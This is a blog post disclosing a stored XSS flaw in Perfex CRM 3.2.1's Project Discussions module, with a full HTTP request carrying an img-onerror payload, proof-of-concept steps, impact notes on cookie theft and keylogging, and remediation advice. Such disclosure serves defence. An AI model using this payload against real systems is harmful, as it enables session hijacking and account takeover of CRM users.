JA Jobyer Ahmed

Stored xss in Perfex CRM 3.2.1 Project Discussions

Mar 18, 2025 2 min read
Blog • Mar 2025

Stored Cross-Site Scripting (XSS) Vulnerability in Perfex CRM Project Discussions

A Stored Cross-Site Scripting (XSS) vulnerability exists in the Project Discussions Module of Perfex CRM, allowing authenticated client users to inject malicious JavaScript payloads. The input is stored in the discussion description and executes whenever another user views the discussion, leading to session hijacking, phishing attacks, or full account compromise.

Request:

POST /perfex/clients/project/2 HTTP/1.1
Host: 192.168.1.11
Content-Length: 173
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://192.168.1.11
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.11/perfex/clients/project/2?group=project_discussions
Accept-Encoding: gzip, deflate, br
Cookie: contact_language=english; csrf_cookie_name=80389ebf9f4a421a35838e8b8fa60994; sp_session=vcki9i2pek4meo4qhpc5m5r8urefusof
Connection: keep-alive

csrf_token_name=80389ebf9f4a421a35838e8b8fa60994&project_id=2&action=new_discussion&subject=Testing+Discussion&description=%26lt%3Bimg+src%3Dx+onerror%3Dalert%281%29%26gt%3B

perfex-project-xss.png

perfex-project-xss-1.png

Affected Endpoint

POST /perfex/clients/project/{project_id} HTTP/1.1

Proof-of-Concept (PoC)

  1. Client Logs In to Perfex CRM.
  2. Navigates to http://192.168.1.11/perfex/clients/project/2?group=project_discussions.
  3. Creates a new discussion and submits the following XSS payload in the Description field: html
  4. Any user (including admins) who views the discussion will trigger the JavaScript execution.

Impact

  • Attackers can steal admin session cookies via JavaScript
  • Automatic Execution: Unlike click-based XSS, this payload triggers instantly when the admin views the page.
  • Full Account Takeover: Inject a keylogger to capture admin input.

Root Cause Analysis

Perfex CRM fails to properly sanitize user input in the contract discussion section.

  • Expected Behavior: User input should be HTML-encoded or filtered for JavaScript execution.
  • Actual Behavior: The system renders user input as raw HTML, leading to stored XSS.
  • Flawed HTML Entity Decoding: The system decodes &lt; and &gt; back into < >, allowing stored JavaScript execution.
  • Sanitize User Input: Apply htmlspecialchars() or strip_tags() on user-submitted comments.
  • Use Content Security Policy (CSP): Implement CSP rules to block inline JavaScript execution.
  • Enable XSS Protection in CodeIgniter: Use $this->security->xss_clean($input) before rendering data.
  • Validate & Escape Output Properly: Ensure all user-generated content is escaped before being displayed.
JA
Written by Jobyer Ahmed
Founder of Bytium, OSCE3-certified cybersecurity expert with deep experience in pentesting and vulnerability assessment.
PreviousTmux Cheat Sheet NextStored xss in Perfex CRM 3.2.1 Contracts Module